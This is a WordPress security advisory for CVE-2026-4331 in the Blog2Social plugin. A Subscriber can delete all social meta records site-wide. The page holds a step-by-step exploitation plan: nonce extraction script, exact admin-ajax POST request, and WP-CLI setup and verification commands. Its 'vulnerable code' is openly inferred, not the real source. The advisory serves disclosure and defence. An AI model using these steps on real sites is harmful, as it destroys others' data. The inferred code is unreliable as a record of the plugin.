WP-Safety
CVE-2026-4331

Blog2Social: Social Media Auto Post & Scheduler <= 8.8.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Deletion via 'b2s_reset_social_meta_tags' AJAX Action

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
8.8.3
Patched in
1d
Time to patch

Description

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized data loss in all versions up to, and including, 8.8.2. This is due to the resetSocialMetaTags() function only verifying that the user has the 'read' capability and a valid b2s_security_nonce, both of which are available to Subscriber-level users, as the plugin grants 'blog2social_access' capability to all roles upon activation, allowing them to access the plugin's admin pages where the nonce is output. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all _b2s_post_meta records from the wp_postmeta table, permanently removing all custom social media meta tags for every post on the site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=8.8.2
PublishedMarch 25, 2026
Last updatedMarch 26, 2026
Affected pluginblog2social

What Changed in the Fix

Changes introduced in v8.8.3

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v8.8.2
Browse source Download .zip
Patched v8.8.3
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4331 ## 1. Vulnerability Summary The **Blog2Social** plugin (<= 8.8.2) contains a missing authorization vulnerability in the `resetSocialMetaTags()` function. This function is triggered by the `b2s_reset_social_meta_tags` AJAX action. The vulnerability exist…

Show full research plan

Exploitation Research Plan: CVE-2026-4331

1. Vulnerability Summary

The Blog2Social plugin (<= 8.8.2) contains a missing authorization vulnerability in the resetSocialMetaTags() function. This function is triggered by the b2s_reset_social_meta_tags AJAX action.

The vulnerability exists because:

  1. The function only checks for the read capability (assigned to all authenticated users, including Subscribers).
  2. The function checks for a nonce named b2s_security_nonce.
  3. Upon activation, the plugin grants the blog2social_access capability to all user roles (including Subscribers), which allows them to view the plugin's admin dashboard where the b2s_security_nonce is generated and displayed in the HTML.
  4. An authenticated attacker with Subscriber-level access can trigger this action to delete all _b2s_post_meta entries from the wp_postmeta table site-wide, causing permanent data loss for social media scheduling and meta configurations.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: b2s_reset_social_meta_tags
  • Required Authentication: Subscriber+ (any user with read capability).
  • Required Parameters:
    • action: b2s_reset_social_meta_tags
    • b2s_security_nonce: A valid nonce for the action (available in the dashboard).
  • Precondition: The plugin must be active, and at least some posts must have Blog2Social meta tags (_b2s_post_meta) stored.

3. Code Flow

  1. Request Entry: A POST or GET request is sent to admin-ajax.php with the action b2s_reset_social_meta_tags.
  2. Hook Registration: The plugin registers the action (likely in the main plugin class or an AJAX handler class):
    add_action('wp_ajax_b2s_reset_social_meta_tags', [$this, 'resetSocialMetaTags']);
  3. Authorization Check (Vulnerable): Inside resetSocialMetaTags(), the code checks:
    if (!current_user_can('read')) { // Subscriber has this
    wp_die();
}
check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');
  4. Data Deletion (Sink): The function proceeds to execute a database query to delete metadata:
    global $wpdb;
$wpdb->query("DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'");

4. Nonce Acquisition Strategy

The b2s_security_nonce is required. The provided JS files (e.g., assets/js/b2s/calendar.js, assets/js/b2s/curation.draft.js) show that the nonce is retrieved from an HTML element with the ID b2s_security_nonce.

Strategy:

  1. Log in as a Subscriber.
  2. Navigate to any Blog2Social dashboard page (e.g., /wp-admin/admin.php?page=blog2social).
  3. Use browser_eval to extract the value of the #b2s_security_nonce input field.
// Example extraction via browser_eval
var nonce = document.getElementById('b2s_security_nonce')?.value;
return nonce;

5. Exploitation Strategy

Step 1: Preparation

  • Create a Subscriber user.
  • Create several posts and ensure they have _b2s_post_meta records (simulated via WP-CLI).

Step 2: Nonce Retrieval

  • Navigate the browser to the Blog2Social dashboard.
  • Extract the b2s_security_nonce.

Step 3: Trigger Meta Deletion

Send the malicious AJAX request.

  • Method: POST
  • URL: http://TARGET/wp-admin/admin-ajax.php
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
    • Cookie: (Subscriber session cookies)
  • Body:
    action=b2s_reset_social_meta_tags&b2s_security_nonce=[EXTRACTED_NONCE]

6. Test Data Setup

  1. Install Plugin: blog2social version 8.8.2.
  2. Create User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  3. Add Sample Meta:
    # Add Blog2Social meta to post 1
wp post create --post_title="Victim Post" --post_status=publish
wp post id list # Assume ID 123
wp post meta add 123 _b2s_post_meta '{"test":"data"}'
  4. Verify Meta Exists:
    wp db query "SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';"

7. Expected Results

  • The AJAX response should be successful (likely 1, {"result": true}, or a 200 OK).
  • All records in wp_postmeta where meta_key = '_b2s_post_meta' will be deleted.

8. Verification Steps

  1. Check Database:
    wp db query "SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';"
    • Successful Exploit: Returns 0.
    • Failed Exploit: Returns the original count.
  2. Check Access: Confirm the Subscriber was able to reach the page even if they don't have typical admin capabilities.

9. Alternative Approaches

If the b2s_reset_social_meta_tags action is not available via wp_ajax_ (authenticated), check for wp_ajax_nopriv_. However, based on the description, it is specifically an authenticated (Subscriber+) vulnerability.

If the nonce is not found on the main dashboard, check other sub-pages registered by the plugin:

  • admin.php?page=blog2social-networks
  • admin.php?page=blog2social-posts

Verify if blog2social_access is indeed granted to Subscribers by checking the roles:

wp role capability list subscriber | grep blog2social
Research Findings
Static analysis — not yet PoC-verified

Summary

The Blog2Social plugin for WordPress is vulnerable to unauthorized arbitrary post meta deletion due to insufficient authorization checks in the 'resetSocialMetaTags' AJAX function. Authenticated attackers with Subscriber-level access can exploit this to delete all '_b2s_post_meta' records site-wide, as the plugin grants all users access to the dashboard where the required security nonce is exposed.

Vulnerable Code

// Logic inferred from the vulnerability description and research plan
// Function responsible for handling the b2s_reset_social_meta_tags action

public function resetSocialMetaTags() {
    // Vulnerable check: 'read' capability is possessed by all authenticated users (Subscribers+)
    if (!current_user_can('read')) {
        wp_die();
    }

    // Nonce is accessible to all roles because blog2social_access is granted to all roles on activation
    check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');

    global $wpdb;
    // Sink: Deletes all metadata for the plugin site-wide without post-specific authorization
    $wpdb->query("DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'");
    
    wp_send_json_success();
}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.2/assets/js/b2s/calendar.js /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.3/assets/js/b2s/calendar.js
--- /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.2/assets/js/b2s/calendar.js	2026-02-27 11:37:02.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.3/assets/js/b2s/calendar.js	2026-03-23 13:17:40.000000000 +0000
@@ -302,6 +302,11 @@
                         'b2s_security_nonce': jQuery('#b2s_security_nonce').val()
                     },
                     success: function (data) {
+                        if (data && data.result === false && data.error == 'permission') {
+                            jQuery('.b2s-no-permission').show();
+                            revertFunc();
+                            return;
+                        }
                         refreshCalender();
                         wp.heartbeat.connectNow();
                     }
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.2/assets/js/b2s/curation.draft.js /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.3/assets/js/b2s/curation.draft.js
--- /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.2/assets/js/b2s/curation.draft.js	2026-02-27 11:37:02.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/blog2social/8.8.3/assets/js/b2s/curation.draft.js	2026-03-23 13:17:40.000000000 +0000
@@ -134,6 +134,9 @@
                 if (data.error == 'nonce') {
                     jQuery('.b2s-nonce-check-fail').show();
                 }
+                if (data.error == 'permission') {
+                    jQuery('.b2s-no-permission').show();
+                }
                 jQuery('.b2s-post-remove-fail').show();
             }

Exploit Outline

1. Log in to the target WordPress site as an authenticated user with at least Subscriber privileges. 2. Access the Blog2Social plugin dashboard (e.g., via `/wp-admin/admin.php?page=blog2social`). Access is possible because the plugin grants the 'blog2social_access' capability to all roles by default. 3. Locate and extract the value of the 'b2s_security_nonce' field from the page source. 4. Trigger the 'b2s_reset_social_meta_tags' AJAX action by sending a POST request to '/wp-admin/admin-ajax.php' with the following parameters: 'action=b2s_reset_social_meta_tags' and 'b2s_security_nonce=[EXTRACTED_NONCE]'. 5. Verify that all social media meta tags (stored with meta_key '_b2s_post_meta') have been deleted from the 'wp_postmeta' database table.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/7dc46bc4-ecfb-438f-b951-7b957489cd96?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database